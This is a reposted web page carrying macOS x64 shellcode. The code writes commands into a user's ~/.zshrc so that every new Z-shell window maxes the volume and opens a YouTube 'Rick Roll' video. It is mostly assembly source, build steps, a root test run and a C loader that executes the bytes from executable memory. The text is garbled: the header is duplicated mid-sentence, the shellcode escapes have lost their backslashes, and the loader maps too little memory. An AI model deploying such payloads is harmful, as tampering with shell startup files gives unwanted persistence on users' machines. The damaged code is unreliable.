macOS x64 zsh RickRolling Shellcode

Details: Written by: khalil shreateh; Category: Vulnerabilities; Hits: 445

/*
## Shellcode Title: macOS/x64 - zsh RickRolling Shellcode (198 Bytes)
## Shellcode Author: Bobby Cooke
## Date: May 31st, 2020
## Tested on: macOS Catali /*
## Shellcode Title: macOS/x64 - zsh RickRolling Shellcode (198 Bytes)
## Shellcode Author: Bobby Cooke
## Date: May 31st, 2020
## Tested on: macOS Catalina v10.15.4
## Shellcode Description:
## MacOS Catalina Dynamic, No-Null Shellcode that will Unmute the systems Volume, set the Volume to Maximum, and "Rick Roll" the user every time they open a Z-Shell Terminal Window.
## The shellcode uses the UNIX ExecVE SysCall to spawn a UNIX SH (/bin/sh). The UNIX SH executes an Echo (/bin/echo) command that adds two commands to the users Z-Shell (zsh) Running Config File (~/.zshrc); the ~/.zshrc file will be created if it does not exist. The first command in the ~/.zshrc file leverages the macOS default system binary OSAScript (/usr/bin/osascript) too unmute the macOS system & set the volume too maximum. The second command in the ~/.zshrc file leverages the macOS default system binary Open (/usr/bin/open) to open the 'Rick Astley - Never Gonna Give You Up' video with the macOS systems default browser.
## C Compile: gcc zsh-rickrolling.c -o zsh-rickrolling
## Apple clang version 11.0.3 (clang-1103.0.32.62)
## Compile & Test:
## root# gcc zsh-rickrolling.c -o zsh-rickrolling
## root# cat ~/.zshrc
## cat: /var/root/.zshrc: No such file or directory
## root# ./zsh-rickrolling
## Shellcode Length: 198 Bytes
## root# cat ~/.zshrc
## osascript -e "set Volume 9"
## open "https://www.youtube.com/watch?v=dQw4w9WgXcQ"
## root# zsh
## root@Mac #
## < Browser Pop & Rick Roll >

---------------------------------------------------------------------

;## ASM Compile: nasm -f macho64 zsh-rickrolling.asm
;## NASM version 2.14.02 compiled on Sep 28 2019
;## OBJ Link: ld zsh-rickrolling.o -lSystem -o zsh-rickrolling
;## BUILD 17:57:49 Apr 24 2020
;## Get SC: /bin/bash for x in $(objdump -d zsh-rickrolling.o -x86-asm-syntax=intel | grep "^ " | cut -f1 | awk -F: '{print $2}'); do echo -n "x"$x; done; echo
global _main
_main:
; execve(const char *path, char *const argv[], char *const envp[]);
; RAX RDI RSI RDX
; RAX = 0x200003b = Execve System Call Number
; RDI = &"/bin/shx00"
; RSI = RSP
; [RSP+10] = argv[0] = &`/bin/shx00`
; [RSP+8] = argv[1] = &`-cx00`
; [RSP+0] = argv[2] = &`echo "open 'https...
; RDX = 0x0
regclear:
xor rsi, rsi ; rsi = 0x0
mul rsi ; rax & rdx = 0x0
argv0:
mov rcx, 0x68732f6e69622fff ; "xff/bin/sh"
shr rcx, 0x8 ; "/bin/shx00"
push rcx ; rsp = &"/bin/shx00"
mov rdi, rsp ; rdi = *path = &"/bin/shx00"
argv1:
add dx, 0x632d ; "-cx00"
push rdx ; rsp = &"-cx00"
mov rbx, rsp ; rbx = &"-cx00"
argv2:
; "echo 'osascript -e "set Volume 9" open "https://www.youtube.com/watch?v=dQw4w9WgXcQ"' >> ~/.zshrc"
; String length : 98
xor rcx, rcx
add cx, 0x6372 ; cr
push rcx
mov rcx, 0x68737a2e2f7e203e ; hsz./~ >
push rcx
mov rcx, 0x3e20272251635867 ; > '"QcXg
push rcx
mov rcx, 0x573977347751643d ; W9w4wQd=
push rcx
mov rcx, 0x763f68637461772f ; v?hctaw/
push rcx
mov rcx, 0x6d6f632e65627574 ; moc.ebut
push rcx
mov rcx, 0x756f792e7777772f ; uoy.www/
push rcx
mov rcx, 0x2f3a737074746822 ; /:sptth"
push rcx
mov rcx, 0x206e65706f0A0D22 ; nepo "
push rcx
mov rcx, 0x3920656d756c6f56 ; 9 emuloV
push rcx
mov rcx, 0x207465732220652d ; tes" e-
push rcx
mov rcx, 0x2074706972637361 ; tpircsa
push rcx
mov rcx, 0x736f27206f686365 ; so' ohce
push rcx
mov r9, rsp ; r9 = &`echo "open 'https...
loadArgv:
xor rdx, rdx ; rdx = envp[] = 0x0
push rdx ; [RSP+18] = 0x0
push r9 ; [RSP+10] = argv[2] = &Command String
push rbx ; [RSP+8] = argv[1] = &`-cx00`
push rdi ; [RSP+0] = argv[0] = &`/bin/shx00`
mov rsi, rsp ; rsi = argv[]
execve:
mov al,2 ; rax = 0x2
ror rax, 0x28 ; rax = 0x2000000
mov al, 0x3b ; rax = 0x200003b
syscall ; execve system call

---------------------------------------------------------------------

*/

#include <stdio.h>
#include <sys/mman.h>
#include <string.h>
#include <stdlib.h>

int (*sc)();

char shellcode[] =
"x48x31xf6x48xf7xe6x48xb9xffx2fx62x69x6ex2fx73x68x48"
"xc1xe9x08x51x48x89xe7x66x81xc2x2dx63x52x48x89xe3x48"
"x31xc9x66x81xc1x72x63x51x48xb9x3ex20x7ex2fx2ex7ax73"
"x68x51x48xb9x67x58x63x51x22x27x20x3ex51x48xb9x3dx64"
"x51x77x34x77x39x57x51x48xb9x2fx77x61x74x63x68x3fx76"
"x51x48xb9x74x75x62x65x2ex63x6fx6dx51x48xb9x2fx77x77"
"x77x2ex79x6fx75x51x48xb9x22x68x74x74x70x73x3ax2fx51"
"x48xb9x22x0dx0ax6fx70x65x6ex20x51x48xb9x56x6fx6cx75"
"x6dx65x20x39x51x48xb9x2dx65x20x22x73x65x74x20x51x48"
"xb9x61x73x63x72x69x70x74x20x51x48xb9x65x63x68x6fx20"
"x27x6fx73x51x49x89xe1x48x31xd2x52x41x51x53x57x48x89"
"xe6xb0x02x48xc1xc8x28xb0x3bx0fx05";

int main(int argc, char **argv) {
printf("Shellcode Length: %zd Bytes ", strlen(shellcode));

void *ptr = mmap(0, 0x22, PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE, -1, 0);

if (ptr == MAP_FAILED) {
perror("mmap");
exit(-1);
}

memcpy(ptr, shellcode, sizeof(shellcode));
sc = ptr;

sc();

return 0;
}